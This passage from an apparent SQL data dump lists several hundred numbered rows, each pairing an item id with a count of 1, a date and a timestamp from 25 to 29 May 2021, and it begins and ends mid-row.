22:53:42'),(22573,3282,1,'2021-05-25','2021-05-25 00:03:09'),(22574,1600,1,'2021-05-25','2021-05-25 00:04:53'),(22575,1602,1,'2021-05-25','2021-05-25 01:06:33'),(22576,68,1,'2021-05-25','2021-05-25 01:07:11'),(22577,108,1,'2021-05-25','2021-05-25 01:07:18'),(22578,487,1,'2021-05-25','2021-05-25 01:09:52'),(22579,469,1,'2021-05-25','2021-05-25 01:10:13'),(22580,471,1,'2021-05-25','2021-05-25 01:12:09'),(22581,3531,1,'2021-05-25','2021-05-25 01:41:01'),(22582,1594,1,'2021-05-25','2021-05-25 01:46:23'),(22583,80,1,'2021-05-25','2021-05-25 01:46:31'),(22584,1594,1,'2021-05-25','2021-05-25 01:47:40'),(22585,1588,1,'2021-05-25','2021-05-25 01:54:34'),(22586,1720,1,'2021-05-25','2021-05-25 01:56:59'),(22587,91,1,'2021-05-25','2021-05-25 01:58:12'),(22588,2991,1,'2021-05-25','2021-05-25 01:58:15'),(22589,1588,1,'2021-05-25','2021-05-25 02:03:17'),(22590,3267,1,'2021-05-25','2021-05-25 02:37:02'),(22591,3267,1,'2021-05-25','2021-05-25 03:47:07'),(22592,1707,1,'2021-05-25','2021-05-25 04:27:27'),(22593,1770,1,'2021-05-25','2021-05-25 06:11:30'),(22594,470,1,'2021-05-25','2021-05-25 06:40:36'),(22595,2904,1,'2021-05-25','2021-05-25 07:18:29'),(22596,1608,1,'2021-05-25','2021-05-25 07:31:01'),(22597,467,1,'2021-05-25','2021-05-25 07:48:07'),(22598,3282,1,'2021-05-25','2021-05-25 08:01:01'),(22599,3117,1,'2021-05-25','2021-05-25 08:07:24'),(22600,1592,1,'2021-05-25','2021-05-25 08:11:54'),(22601,1614,1,'2021-05-25','2021-05-25 08:31:15'),(22602,91,1,'2021-05-25','2021-05-25 08:32:17'),(22603,1695,1,'2021-05-25','2021-05-25 09:01:10'),(22604,2704,1,'2021-05-25','2021-05-25 09:31:16'),(22605,1586,1,'2021-05-25','2021-05-25 09:45:18'),(22606,80,1,'2021-05-25','2021-05-25 10:01:24'),(22607,80,1,'2021-05-25','2021-05-25 10:03:20'),(22608,1766,1,'2021-05-25','2021-05-25 10:24:19'),(22609,1718,1,'2021-05-25','2021-05-25 10:40:53'),(22610,1602,1,'2021-05-25','2021-05-25 10:43:36'),(22611,1604,1,'2021-05-25','2021-05-25 11:14:38'),(22612,1604,1,'2021-05-25','2021-05-25 11:16:04'),(22613,1604,1,'2021-05-25','2021-05-25 11:17:45'),(22614,1604,1,'2021-05-25','2021-05-25 11:19:13'),(22615,2159,1,'2021-05-25','2021-05-25 11:31:37'),(22616,2309,1,'2021-05-25','2021-05-25 11:47:06'),(22617,1588,1,'2021-05-25','2021-05-25 11:58:25'),(22618,108,1,'2021-05-25','2021-05-25 12:00:13'),(22619,3531,1,'2021-05-25','2021-05-25 12:19:17'),(22620,1768,1,'2021-05-25','2021-05-25 12:25:19'),(22621,91,1,'2021-05-25','2021-05-25 12:35:10'),(22622,3267,1,'2021-05-25','2021-05-25 12:49:39'),(22623,2159,1,'2021-05-25','2021-05-25 12:51:43'),(22624,1602,1,'2021-05-25','2021-05-25 13:30:37'),(22625,3030,1,'2021-05-25','2021-05-25 13:44:56'),(22626,3030,1,'2021-05-25','2021-05-25 13:45:03'),(22627,3664,1,'2021-05-25','2021-05-25 13:50:58'),(22628,2704,1,'2021-05-25','2021-05-25 14:06:26'),(22629,1602,1,'2021-05-25','2021-05-25 14:23:54'),(22630,1598,1,'2021-05-25','2021-05-25 14:24:30'),(22631,3030,1,'2021-05-25','2021-05-25 14:26:11'),(22632,3030,1,'2021-05-25','2021-05-25 14:26:12'),(22633,1594,1,'2021-05-25','2021-05-25 14:37:19'),(22634,1602,1,'2021-05-25','2021-05-25 14:38:54'),(22635,2150,1,'2021-05-25','2021-05-25 14:50:59'),(22636,1602,1,'2021-05-25','2021-05-25 15:56:00'),(22637,1602,1,'2021-05-25','2021-05-25 16:03:57'),(22638,1594,1,'2021-05-25','2021-05-25 16:46:01'),(22639,1703,1,'2021-05-25','2021-05-25 16:51:30'),(22640,1594,1,'2021-05-25','2021-05-25 16:53:36'),(22641,1586,1,'2021-05-25','2021-05-25 17:06:14'),(22642,1586,1,'2021-05-25','2021-05-25 17:06:18'),(22643,1586,1,'2021-05-25','2021-05-25 17:06:25'),(22644,1697,1,'2021-05-25','2021-05-25 17:07:14'),(22645,1600,1,'2021-05-25','2021-05-25 17:30:32'),(22646,1600,1,'2021-05-25','2021-05-25 17:30:36'),(22647,1600,1,'2021-05-25','2021-05-25 17:30:36'),(22648,1598,1,'2021-05-25','2021-05-25 18:07:36'),(22649,1608,1,'2021-05-25','2021-05-25 18:09:01'),(22650,1598,1,'2021-05-25','2021-05-25 18:17:17'),(22651,1598,1,'2021-05-25','2021-05-25 18:22:57'),(22652,3282,1,'2021-05-25','2021-05-25 18:39:00'),(22653,2775,1,'2021-05-25','2021-05-25 18:45:15'),(22654,467,1,'2021-05-25','2021-05-25 19:02:09'),(22655,1695,1,'2021-05-25','2021-05-25 19:21:24'),(22656,1594,1,'2021-05-25','2021-05-25 19:24:35'),(22657,1720,1,'2021-05-25','2021-05-25 19:32:21'),(22658,1594,1,'2021-05-25','2021-05-25 20:31:18'),(22659,3531,1,'2021-05-25','2021-05-25 21:02:43'),(22660,91,1,'2021-05-25','2021-05-25 22:06:40'),(22661,1720,1,'2021-05-26','2021-05-26 00:23:40'),(22662,2503,1,'2021-05-26','2021-05-26 00:43:37'),(22663,3038,1,'2021-05-26','2021-05-26 01:43:27'),(22664,3267,1,'2021-05-26','2021-05-26 01:53:38'),(22665,1592,1,'2021-05-26','2021-05-26 01:54:26'),(22666,3282,1,'2021-05-26','2021-05-26 02:00:48'),(22667,2993,1,'2021-05-26','2021-05-26 02:04:56'),(22668,3285,1,'2021-05-26','2021-05-26 02:06:28'),(22669,2993,1,'2021-05-26','2021-05-26 02:17:12'),(22670,72,1,'2021-05-26','2021-05-26 02:18:50'),(22671,3707,1,'2021-05-26','2021-05-26 02:20:28'),(22672,72,1,'2021-05-26','2021-05-26 02:21:14'),(22673,2993,1,'2021-05-26','2021-05-26 02:21:38'),(22674,76,1,'2021-05-26','2021-05-26 02:22:38'),(22675,2993,1,'2021-05-26','2021-05-26 02:23:22'),(22676,2503,1,'2021-05-26','2021-05-26 02:44:33'),(22677,1608,1,'2021-05-26','2021-05-26 03:31:02'),(22678,2309,1,'2021-05-26','2021-05-26 04:16:12'),(22679,1608,1,'2021-05-26','2021-05-26 05:15:29'),(22680,2159,1,'2021-05-26','2021-05-26 05:20:54'),(22681,1608,1,'2021-05-26','2021-05-26 05:45:27'),(22682,2457,1,'2021-05-26','2021-05-26 06:32:45'),(22683,2457,1,'2021-05-26','2021-05-26 06:35:30'),(22684,2457,1,'2021-05-26','2021-05-26 06:36:12'),(22685,1608,1,'2021-05-26','2021-05-26 06:46:27'),(22686,3267,1,'2021-05-26','2021-05-26 07:36:20'),(22687,3531,1,'2021-05-26','2021-05-26 07:45:18'),(22688,1695,1,'2021-05-26','2021-05-26 07:45:28'),(22689,1582,1,'2021-05-26','2021-05-26 07:49:29'),(22690,467,1,'2021-05-26','2021-05-26 08:46:09'),(22691,1594,1,'2021-05-26','2021-05-26 08:53:29'),(22692,3109,1,'2021-05-26','2021-05-26 09:39:49'),(22693,2904,1,'2021-05-26','2021-05-26 09:40:38'),(22694,2904,1,'2021-05-26','2021-05-26 09:42:14'),(22695,1770,1,'2021-05-26','2021-05-26 10:03:39'),(22696,1608,1,'2021-05-26','2021-05-26 10:06:59'),(22697,1608,1,'2021-05-26','2021-05-26 10:07:01'),(22698,1608,1,'2021-05-26','2021-05-26 10:07:02'),(22699,1608,1,'2021-05-26','2021-05-26 10:09:07'),(22700,1608,1,'2021-05-26','2021-05-26 10:09:47'),(22701,1697,1,'2021-05-26','2021-05-26 10:14:35'),(22702,1707,1,'2021-05-26','2021-05-26 10:16:15'),(22703,2161,1,'2021-05-26','2021-05-26 10:21:47'),(22704,1588,1,'2021-05-26','2021-05-26 10:51:39'),(22705,1602,1,'2021-05-26','2021-05-26 10:58:56'),(22706,1594,1,'2021-05-26','2021-05-26 11:04:06'),(22707,2503,1,'2021-05-26','2021-05-26 11:23:09'),(22708,87,1,'2021-05-26','2021-05-26 11:46:12'),(22709,473,1,'2021-05-26','2021-05-26 11:46:37'),(22710,1600,1,'2021-05-26','2021-05-26 11:47:37'),(22711,1600,1,'2021-05-26','2021-05-26 11:47:39'),(22712,1600,1,'2021-05-26','2021-05-26 11:51:47'),(22713,91,1,'2021-05-26','2021-05-26 11:53:11'),(22714,1610,1,'2021-05-26','2021-05-26 12:03:34'),(22715,1718,1,'2021-05-26','2021-05-26 12:07:07'),(22716,2457,1,'2021-05-26','2021-05-26 12:08:32'),(22717,91,1,'2021-05-26','2021-05-26 12:08:52'),(22718,3267,1,'2021-05-26','2021-05-26 12:17:36'),(22719,1602,1,'2021-05-26','2021-05-26 12:18:35'),(22720,80,1,'2021-05-26','2021-05-26 12:19:23'),(22721,1600,1,'2021-05-26','2021-05-26 12:59:24'),(22722,1600,1,'2021-05-26','2021-05-26 12:59:24'),(22723,2165,1,'2021-05-26','2021-05-26 13:07:08'),(22724,1699,1,'2021-05-26','2021-05-26 13:10:02'),(22725,1602,1,'2021-05-26','2021-05-26 13:39:49'),(22726,1602,1,'2021-05-26','2021-05-26 13:51:00'),(22727,87,1,'2021-05-26','2021-05-26 14:19:34'),(22728,1582,1,'2021-05-26','2021-05-26 14:21:54'),(22729,2297,1,'2021-05-26','2021-05-26 14:26:19'),(22730,1602,1,'2021-05-26','2021-05-26 14:26:50'),(22731,74,1,'2021-05-26','2021-05-26 14:32:41'),(22732,1602,1,'2021-05-26','2021-05-26 14:55:27'),(22733,1602,1,'2021-05-26','2021-05-26 14:59:16'),(22734,1592,1,'2021-05-26','2021-05-26 15:02:33'),(22735,1602,1,'2021-05-26','2021-05-26 15:04:22'),(22736,1588,1,'2021-05-26','2021-05-26 15:14:14'),(22737,1602,1,'2021-05-26','2021-05-26 15:16:59'),(22738,84,1,'2021-05-26','2021-05-26 15:17:34'),(22739,91,1,'2021-05-26','2021-05-26 15:20:44'),(22740,1720,1,'2021-05-26','2021-05-26 15:37:34'),(22741,1608,1,'2021-05-26','2021-05-26 15:47:55'),(22742,1582,1,'2021-05-26','2021-05-26 15:50:36'),(22743,1588,1,'2021-05-26','2021-05-26 16:04:10'),(22744,91,1,'2021-05-26','2021-05-26 16:07:59'),(22745,570,1,'2021-05-26','2021-05-26 16:31:01'),(22746,2609,1,'2021-05-26','2021-05-26 16:31:23'),(22747,2609,1,'2021-05-26','2021-05-26 16:31:49'),(22748,1602,1,'2021-05-26','2021-05-26 16:35:39'),(22749,570,1,'2021-05-26','2021-05-26 16:36:58'),(22750,1586,1,'2021-05-26','2021-05-26 16:55:59'),(22751,80,1,'2021-05-26','2021-05-26 17:03:12'),(22752,80,1,'2021-05-26','2021-05-26 17:21:39'),(22753,3531,1,'2021-05-26','2021-05-26 18:10:47'),(22754,2911,1,'2021-05-26','2021-05-26 18:53:02'),(22755,488,1,'2021-05-26','2021-05-26 18:57:14'),(22756,467,1,'2021-05-26','2021-05-26 20:01:13'),(22757,1602,1,'2021-05-26','2021-05-26 20:11:36'),(22758,1600,1,'2021-05-26','2021-05-26 20:31:40'),(22759,1600,1,'2021-05-26','2021-05-26 20:33:25'),(22760,1600,1,'2021-05-26','2021-05-26 20:33:25'),(22761,570,1,'2021-05-26','2021-05-26 22:26:45'),(22762,3267,1,'2021-05-26','2021-05-26 22:33:11'),(22763,1588,1,'2021-05-27','2021-05-27 00:19:17'),(22764,1720,1,'2021-05-27','2021-05-27 01:41:53'),(22765,3534,1,'2021-05-27','2021-05-27 02:47:03'),(22766,3710,1,'2021-05-27','2021-05-27 02:47:06'),(22767,3531,1,'2021-05-27','2021-05-27 02:47:06'),(22768,3498,1,'2021-05-27','2021-05-27 02:47:07'),(22769,3486,1,'2021-05-27','2021-05-27 02:47:07'),(22770,3430,1,'2021-05-27','2021-05-27 02:47:09'),(22771,3714,1,'2021-05-27','2021-05-27 02:47:10'),(22772,3316,1,'2021-05-27','2021-05-27 02:47:11'),(22773,3489,1,'2021-05-27','2021-05-27 02:47:11'),(22774,3438,1,'2021-05-27','2021-05-27 02:47:12'),(22775,3531,1,'2021-05-27','2021-05-27 02:47:13'),(22776,3710,1,'2021-05-27','2021-05-27 02:47:16'),(22777,3486,1,'2021-05-27','2021-05-27 02:47:16'),(22778,3479,1,'2021-05-27','2021-05-27 02:47:17'),(22779,3482,1,'2021-05-27','2021-05-27 02:47:17'),(22780,3534,1,'2021-05-27','2021-05-27 02:47:18'),(22781,3714,1,'2021-05-27','2021-05-27 02:47:19'),(22782,3489,1,'2021-05-27','2021-05-27 02:47:19'),(22783,3438,1,'2021-05-27','2021-05-27 02:47:20'),(22784,3498,1,'2021-05-27','2021-05-27 02:47:21'),(22785,2457,1,'2021-05-27','2021-05-27 04:46:48'),(22786,2148,1,'2021-05-27','2021-05-27 05:02:18'),(22787,87,1,'2021-05-27','2021-05-27 05:11:06'),(22788,467,1,'2021-05-27','2021-05-27 05:34:15'),(22789,484,1,'2021-05-27','2021-05-27 05:45:49'),(22790,484,1,'2021-05-27','2021-05-27 05:46:37'),(22791,1720,1,'2021-05-27','2021-05-27 06:14:05'),(22792,1604,1,'2021-05-27','2021-05-27 06:46:34'),(22793,1594,1,'2021-05-27','2021-05-27 06:59:37'),(22794,1594,1,'2021-05-27','2021-05-27 07:02:18'),(22795,1594,1,'2021-05-27','2021-05-27 07:13:16'),(22796,80,1,'2021-05-27','2021-05-27 07:36:30'),(22797,3531,1,'2021-05-27','2021-05-27 08:05:13'),(22798,80,1,'2021-05-27','2021-05-27 08:10:57'),(22799,1728,1,'2021-05-27','2021-05-27 08:23:38'),(22800,91,1,'2021-05-27','2021-05-27 08:26:43'),(22801,1602,1,'2021-05-27','2021-05-27 09:09:27'),(22802,1602,1,'2021-05-27','2021-05-27 09:09:35'),(22803,1602,1,'2021-05-27','2021-05-27 09:09:47'),(22804,1602,1,'2021-05-27','2021-05-27 09:12:28'),(22805,80,1,'2021-05-27','2021-05-27 09:35:01'),(22806,2457,1,'2021-05-27','2021-05-27 09:41:33'),(22807,91,1,'2021-05-27','2021-05-27 10:14:21'),(22808,1594,1,'2021-05-27','2021-05-27 10:23:50'),(22809,2161,1,'2021-05-27','2021-05-27 10:35:54'),(22810,3267,1,'2021-05-27','2021-05-27 10:47:10'),(22811,1612,1,'2021-05-27','2021-05-27 10:51:40'),(22812,1774,1,'2021-05-27','2021-05-27 10:52:59'),(22813,76,1,'2021-05-27','2021-05-27 10:53:31'),(22814,87,1,'2021-05-27','2021-05-27 10:55:46'),(22815,486,1,'2021-05-27','2021-05-27 10:56:15'),(22816,91,1,'2021-05-27','2021-05-27 10:56:47'),(22817,1594,1,'2021-05-27','2021-05-27 11:06:38'),(22818,80,1,'2021-05-27','2021-05-27 11:09:17'),(22819,3691,1,'2021-05-27','2021-05-27 11:36:17'),(22820,1586,1,'2021-05-27','2021-05-27 12:07:24'),(22821,1592,1,'2021-05-27','2021-05-27 12:10:14'),(22822,1594,1,'2021-05-27','2021-05-27 12:20:53'),(22823,1600,1,'2021-05-27','2021-05-27 12:23:50'),(22824,1600,1,'2021-05-27','2021-05-27 12:23:51'),(22825,1596,1,'2021-05-27','2021-05-27 12:25:04'),(22826,1596,1,'2021-05-27','2021-05-27 12:25:49'),(22827,1707,1,'2021-05-27','2021-05-27 12:38:02'),(22828,2704,1,'2021-05-27','2021-05-27 12:43:36'),(22829,3038,1,'2021-05-27','2021-05-27 12:47:25'),(22830,91,1,'2021-05-27','2021-05-27 13:03:58'),(22831,91,1,'2021-05-27','2021-05-27 13:17:12'),(22832,1586,1,'2021-05-27','2021-05-27 13:29:10'),(22833,91,1,'2021-05-27','2021-05-27 13:30:41'),(22834,1747,1,'2021-05-27','2021-05-27 13:30:50'),(22835,1582,1,'2021-05-27','2021-05-27 13:32:21'),(22836,1582,1,'2021-05-27','2021-05-27 13:37:20'),(22837,1600,1,'2021-05-27','2021-05-27 13:45:44'),(22838,1600,1,'2021-05-27','2021-05-27 13:45:46'),(22839,1600,1,'2021-05-27','2021-05-27 13:47:54'),(22840,1600,1,'2021-05-27','2021-05-27 13:47:54'),(22841,1747,1,'2021-05-27','2021-05-27 13:49:09'),(22842,1747,1,'2021-05-27','2021-05-27 13:49:17'),(22843,1747,1,'2021-05-27','2021-05-27 13:52:36'),(22844,1592,1,'2021-05-27','2021-05-27 14:03:05'),(22845,1592,1,'2021-05-27','2021-05-27 14:10:44'),(22846,1592,1,'2021-05-27','2021-05-27 14:11:25'),(22847,1588,1,'2021-05-27','2021-05-27 14:13:34'),(22848,91,1,'2021-05-27','2021-05-27 15:03:16'),(22849,1600,1,'2021-05-27','2021-05-27 15:04:54'),(22850,1612,1,'2021-05-27','2021-05-27 15:10:23'),(22851,467,1,'2021-05-27','2021-05-27 15:18:24'),(22852,91,1,'2021-05-27','2021-05-27 15:28:49'),(22853,1596,1,'2021-05-27','2021-05-27 15:29:40'),(22854,1596,1,'2021-05-27','2021-05-27 15:30:16'),(22855,1720,1,'2021-05-27','2021-05-27 15:48:37'),(22856,1586,1,'2021-05-27','2021-05-27 15:55:48'),(22857,1600,1,'2021-05-27','2021-05-27 16:00:19'),(22858,108,1,'2021-05-27','2021-05-27 16:00:30'),(22859,1600,1,'2021-05-27','2021-05-27 16:01:34'),(22860,68,1,'2021-05-27','2021-05-27 16:01:45'),(22861,1600,1,'2021-05-27','2021-05-27 16:02:31'),(22862,87,1,'2021-05-27','2021-05-27 16:03:43'),(22863,473,1,'2021-05-27','2021-05-27 16:03:50'),(22864,471,1,'2021-05-27','2021-05-27 16:04:01'),(22865,1747,1,'2021-05-27','2021-05-27 16:05:05'),(22866,1600,1,'2021-05-27','2021-05-27 16:09:01'),(22867,3531,1,'2021-05-27','2021-05-27 16:59:02'),(22868,1586,1,'2021-05-27','2021-05-27 17:30:08'),(22869,1586,1,'2021-05-27','2021-05-27 17:30:09'),(22870,2309,1,'2021-05-27','2021-05-27 17:33:08'),(22871,1604,1,'2021-05-27','2021-05-27 17:34:49'),(22872,1586,1,'2021-05-27','2021-05-27 18:19:59'),(22873,1766,1,'2021-05-27','2021-05-27 18:20:15'),(22874,1586,1,'2021-05-27','2021-05-27 18:20:24'),(22875,80,1,'2021-05-27','2021-05-27 18:22:52'),(22876,80,1,'2021-05-27','2021-05-27 18:24:25'),(22877,1734,1,'2021-05-27','2021-05-27 18:26:40'),(22878,80,1,'2021-05-27','2021-05-27 18:50:04'),(22879,1602,1,'2021-05-27','2021-05-27 19:19:35'),(22880,1614,1,'2021-05-27','2021-05-27 20:11:22'),(22881,1614,1,'2021-05-27','2021-05-27 20:11:25'),(22882,1720,1,'2021-05-27','2021-05-27 21:02:10'),(22883,2503,1,'2021-05-27','2021-05-27 21:10:38'),(22884,3038,1,'2021-05-27','2021-05-27 21:30:53'),(22885,570,1,'2021-05-27','2021-05-27 21:35:03'),(22886,3680,1,'2021-05-27','2021-05-27 21:46:54'),(22887,72,1,'2021-05-27','2021-05-27 21:55:38'),(22888,3267,1,'2021-05-27','2021-05-27 22:02:31'),(22889,2751,1,'2021-05-27','2021-05-27 22:09:59'),(22890,1707,1,'2021-05-27','2021-05-27 22:25:21'),(22891,1588,1,'2021-05-27','2021-05-27 22:44:11'),(22892,3069,1,'2021-05-27','2021-05-27 22:48:38'),(22893,87,1,'2021-05-27','2021-05-27 23:42:28'),(22894,1606,1,'2021-05-27','2021-05-27 23:55:09'),(22895,1707,1,'2021-05-28','2021-05-28 00:06:57'),(22896,1602,1,'2021-05-28','2021-05-28 00:30:04'),(22897,1602,1,'2021-05-28','2021-05-28 00:38:12'),(22898,1588,1,'2021-05-28','2021-05-28 01:00:16'),(22899,1602,1,'2021-05-28','2021-05-28 01:39:28'),(22900,3531,1,'2021-05-28','2021-05-28 02:32:54'),(22901,2457,1,'2021-05-28','2021-05-28 02:55:41'),(22902,1592,1,'2021-05-28','2021-05-28 03:16:27'),(22903,3267,1,'2021-05-28','2021-05-28 03:22:49'),(22904,2904,1,'2021-05-28','2021-05-28 03:50:40'),(22905,3087,1,'2021-05-28','2021-05-28 05:43:02'),(22906,1582,1,'2021-05-28','2021-05-28 07:46:25'),(22907,1582,1,'2021-05-28','2021-05-28 07:47:04'),(22908,1766,1,'2021-05-28','2021-05-28 08:54:20'),(22909,1600,1,'2021-05-28','2021-05-28 09:09:10'),(22910,1724,1,'2021-05-28','2021-05-28 09:09:32'),(22911,1747,1,'2021-05-28','2021-05-28 09:15:23'),(22912,1747,1,'2021-05-28','2021-05-28 09:18:00'),(22913,1747,1,'2021-05-28','2021-05-28 09:29:07'),(22914,2309,1,'2021-05-28','2021-05-28 09:48:32'),(22915,2704,1,'2021-05-28','2021-05-28 09:53:00'),(22916,2704,1,'2021-05-28','2021-05-28 09:58:52'),(22917,87,1,'2021-05-28','2021-05-28 09:59:35'),(22918,2704,1,'2021-05-28','2021-05-28 09:59:48'),(22919,1586,1,'2021-05-28','2021-05-28 11:24:33'),(22920,80,1,'2021-05-28','2021-05-28 11:29:45'),(22921,1766,1,'2021-05-28','2021-05-28 11:38:39'),(22922,1734,1,'2021-05-28','2021-05-28 12:09:26'),(22923,1602,1,'2021-05-28','2021-05-28 12:16:09'),(22924,3680,1,'2021-05-28','2021-05-28 12:50:15'),(22925,1600,1,'2021-05-28','2021-05-28 12:55:02'),(22926,1588,1,'2021-05-28','2021-05-28 13:11:50'),(22927,3531,1,'2021-05-28','2021-05-28 13:13:59'),(22928,3531,1,'2021-05-28','2021-05-28 13:15:27'),(22929,472,1,'2021-05-28','2021-05-28 13:31:06'),(22930,2309,1,'2021-05-28','2021-05-28 14:00:48'),(22931,2704,1,'2021-05-28','2021-05-28 14:13:09'),(22932,2457,1,'2021-05-28','2021-05-28 14:16:19'),(22933,3175,1,'2021-05-28','2021-05-28 14:51:39'),(22934,2159,1,'2021-05-28','2021-05-28 14:52:06'),(22935,1610,1,'2021-05-28','2021-05-28 14:56:52'),(22936,1610,1,'2021-05-28','2021-05-28 14:56:53'),(22937,1610,1,'2021-05-28','2021-05-28 14:57:02'),(22938,1774,1,'2021-05-28','2021-05-28 15:04:17'),(22939,91,1,'2021-05-28','2021-05-28 15:06:04'),(22940,1586,1,'2021-05-28','2021-05-28 15:11:13'),(22941,1602,1,'2021-05-28','2021-05-28 15:31:34'),(22942,1600,1,'2021-05-28','2021-05-28 15:32:58'),(22943,1600,1,'2021-05-28','2021-05-28 15:33:00'),(22944,570,1,'2021-05-28','2021-05-28 15:35:28'),(22945,570,1,'2021-05-28','2021-05-28 15:35:34'),(22946,91,1,'2021-05-28','2021-05-28 16:12:57'),(22947,1600,1,'2021-05-28','2021-05-28 16:20:42'),(22948,1594,1,'2021-05-28','2021-05-28 16:31:02'),(22949,1596,1,'2021-05-28','2021-05-28 16:31:55'),(22950,1602,1,'2021-05-28','2021-05-28 16:33:02'),(22951,1602,1,'2021-05-28','2021-05-28 16:36:55'),(22952,1586,1,'2021-05-28','2021-05-28 17:01:06'),(22953,2609,1,'2021-05-28','2021-05-28 17:03:07'),(22954,91,1,'2021-05-28','2021-05-28 17:07:26'),(22955,1586,1,'2021-05-28','2021-05-28 17:10:38'),(22956,1720,1,'2021-05-28','2021-05-28 17:10:58'),(22957,1586,1,'2021-05-28','2021-05-28 17:14:04'),(22958,2150,1,'2021-05-28','2021-05-28 17:14:47'),(22959,3053,1,'2021-05-28','2021-05-28 17:25:08'),(22960,91,1,'2021-05-28','2021-05-28 17:27:46'),(22961,3313,1,'2021-05-28','2021-05-28 17:33:04'),(22962,2178,1,'2021-05-28','2021-05-28 17:44:14'),(22963,1594,1,'2021-05-28','2021-05-28 17:52:12'),(22964,1586,1,'2021-05-28','2021-05-28 18:04:42'),(22965,1586,1,'2021-05-28','2021-05-28 18:10:06'),(22966,1614,1,'2021-05-28','2021-05-28 18:29:15'),(22967,74,1,'2021-05-28','2021-05-28 18:44:13'),(22968,3267,1,'2021-05-28','2021-05-28 18:51:57'),(22969,1774,1,'2021-05-28','2021-05-28 18:52:08'),(22970,1602,1,'2021-05-28','2021-05-28 19:00:33'),(22971,2964,1,'2021-05-28','2021-05-28 19:21:57'),(22972,1586,1,'2021-05-28','2021-05-28 19:30:42'),(22973,1582,1,'2021-05-28','2021-05-28 19:42:04'),(22974,2309,1,'2021-05-28','2021-05-28 20:22:06'),(22975,2991,1,'2021-05-28','2021-05-28 20:27:54'),(22976,3243,1,'2021-05-28','2021-05-28 21:34:13'),(22977,1600,1,'2021-05-28','2021-05-28 21:42:09'),(22978,1600,1,'2021-05-28','2021-05-28 22:42:36'),(22979,1600,1,'2021-05-28','2021-05-28 22:50:25'),(22980,1594,1,'2021-05-28','2021-05-28 22:56:29'),(22981,2159,1,'2021-05-28','2021-05-28 23:43:34'),(22982,1588,1,'2021-05-28','2021-05-28 23:53:42'),(22983,2769,1,'2021-05-29','2021-05-29 00:13:23'),(22984,2159,1,'2021-05-29','2021-05-29 00:13:34'),(22985,1604,1,'2021-05-29','2021-05-29 00:34:03'),(22986,2150,1,'2021-05-29','2021-05-29 00:43:35'),(22987,2309,1,'2021-05-29','2021-05-29 00:43:41'),(22988,2309,1,'2021-05-29','2021-05-29 00:49:55'),(22989,472,1,'2021-05-29','2021-05-29 00:54:14'),(22990,2309,1,'2021-05-29','2021-05-29 00:55:54'),(22991,1726,1,'2021-05-29','2021-05-29 01:13:34'),(22992,1604,1,'2021-05-29','2021-05-29 01:14:21'),(22993,1726,1,'2021-05-29','2021-05-29 01:43:35'),(22994,3498,1,'2021-05-29','2021-05-29 01:44:53'),(22995,1602,1,'2021-05-29','2021-05-29 02:14:42'),(22996,570,1,'2021-05-29','2021-05-29 02:34:58'),(22997,3313,1,'2021-05-29','2021-05-29 02:54:53'),(22998,570,1,'2021-05-29','2021-05-29 03:04:49'),(22999,1598,1,'2021-05-29','2021-05-29 03:14:41'),(23000,3285,1,'2021-05-29','2021-05-29 04:24:36'),(23001,2309,1,'2021-05-29','2021-05-29 04:50:56'),(23002,2309,1,'2021-05-29','2021-05-29 04:55:12'),(23003,1586,1,'2021-05-29','2021-05-29 05:15:51'),(23004,1582,1,'2021-05-29','2021-05-29 05:25:43'),(23005,2309,1,'2021-05-29','2021-05-29 06:05:40'),(23006,3313,1,'2021-05-29','2021-05-29 06:15:47'),(23007,2704,1,'2021-05-29','2021-05-29 06:56:05'),(23008,1610,1,'2021-05-29','2021-05-29 07:05:55'),(23009,2609,1,'2021-05-29','2021-05-29 07:15:56'),(23010,1586,1,'2021-05-29','2021-05-29 07:26:23'),(23011,3707,1,'2021-05-29','2021-05-29 08:26:29'),(23012,1600,1,'2021-05-29','2021-05-29 08:55:32'),(23013,1588,1,'2021-05-29','2021-05-29 09:22:44'),(23014,470,1,'2021-05-29','2021-05-29 09:45:19'),(23015,1610,1,'2021-05-29','2021-05-29 09:52:46'),(23016,1610,1,'2021-05-29','2021-05-29 09:55:26'),(23017,80,1,'2021-05-29','2021-05-29 10:05:41'),(23018,1604,1,'2021-05-29','2021-05-29 10:16:59'),(23019,472,1,'2021-05-29','2021-05-29 10:25:32'),(23020,1582,1,'2021-05-29','2021-05-29 10:35:42'),(23021,486,1,'2021-05-29','2021-05-29 10:38:08'),(23022,2809,1,'2021-05-29','2021-05-29 10:45:51'),(23023,1600,1,'2021-05-29','2021-05-29 10:55:34'),(23024,1602,1,'2021-05-29','2021-05-29 11:05:31'),(23025,1592,1,'2021-05-29','2021-05-29 11:15:41'),(23026,570,1,'2021-05-29','2021-05-29 11:25:48'),(23027,3498,1,'2021-05-29','2021-05-29 11:56:00'),(23028,2309,1,'2021-05-29','2021-05-29 12:37:14'),(23029,1598,1,'2021-05-29','2021-05-29 12:37:34'),(23030,1594,1,'2021-05-29','2021-05-29 12:46:10'),(23031,1718,1,'2021-05-29','2021-05-29 12:56:01'),(23032,2704,1,'2021-05-29','2021-05-29 13:05:49'),(23033,3541,1,'2021-05-29','2021-05-29 13:10:32'),(23034,1594,1,'2021-05-29','2021-05-29 13:22:41'),(23035,80,1,'2021-05-29','2021-05-29 13:26:00'),(23036,1596,1,'2021-05-29','2021-05-29 13:56:42'),(23037,1582,1,'2021-05-29','2021-05-29 14:16:44'),(23038,2609,1,'2021-05-29','2021-05-29 14:26:40'),(23039,2964,1,'2021-05-29','2021-05-29 14:36:52'),(23040,1594,1,'2021-05-29','2021-05-29 14:47:06'),(23041,2617,1,'2021-05-29','2021-05-29 15:07:00'),(23042,1604,1,'2021-05-29','2021-05-29 15:30:10'),(23043,1604,1,'2021-05-29','2021-05-29 15:37:21'),(23044,3104,1,'2021-05-29','2021-05-29 15:47:08'),(23045,3104,1,'2021-05-29','2021-05-29 16:07:04'),(23046,1606,1,'2021-05-29','2021-05-29 16:07:08'),(23047,1586,1,'2021-05-29','2021-05-29 16:27:06'),(23048,2804,1,'2021-05-29','2021-05-29 16:47:26'),(23049,3278,1,'2021-05-29','2021-05-29 16:56:59'),(23050,1586,1,'2021-05-29','2021-05-29 16:57:12'),(23051,2609,1,'2021-05-29','2021-05-29 17:06:57'),(23052,1600,1,'2021-05-29','2021-05-29 17:17:09'),(23053,3247,1,'2021-05-29','2021-05-29 17:47:22'),(23054,1602,1,'2021-05-29','2021-05-29 17:56:37'),(23055,1588,1,'2021-05-29','2021-05-29 18:17:10'),(23056,1602,1,'2021-05-29','2021-05-29 18:27:25'),(23057,2769,1,'2021-05-29','2021-05-29 18:37:25'),(23058,1614,1,'2021-05-29','2021-05-29 